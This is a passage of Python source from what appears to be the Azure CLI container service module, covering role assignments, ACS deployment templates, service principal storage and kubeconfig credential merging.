return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False, is_service_principal=is_service_principal)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None, is_service_principal=True):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope,
is_service_principal=is_service_principal)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups,
is_service_principal=True):
assignee_object_id = None
if assignee:
if is_service_principal:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
else:
assignee_object_id = assignee
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
_re_user_assigned_identity_resource_id = _get_user_assigned_identity_resource_id_regular_expression()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
raise ClientRequestError(ex.message)
return identity
raise InvalidArgumentValueError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(
reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cmd,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cmd, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = assignee
if resolve_assignee:
from azure.graphrbac.models import GraphErrorException
error_msg = "Failed to resolve service principal object ID: "
try:
object_id = _resolve_object_id(cmd.cli_ctx, assignee)
except GraphErrorException as ex:
if ex.response is not None:
error_code = getattr(ex.response, "status_code", None)
error_reason = getattr(ex.response, "reason", None)
internal_error = ""
if error_code:
internal_error += str(error_code)
if error_reason:
if internal_error:
internal_error += " - "
internal_error += str(error_reason)
if internal_error:
error_msg += "({}) ".format(internal_error)
error_msg += ex.message
# this should be UserFault or ServiceError, but it is meaningless to distinguish them here
raise CLIError(error_msg)
except Exception as ex: # pylint: disable=bare-except
raise CLIError(error_msg + str(ex))
assignment_name = uuid.uuid4()
custom_headers = None
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentProperties', mod='models',
operation_group='role_assignments')
properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cmd, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
return_msg = None
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning(
"There is a known issue for Kubernetes versions < 1.17.14 when connecting to "
"ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for"
"more information."
)
except subprocess.CalledProcessError as err:
raise ValidationError(
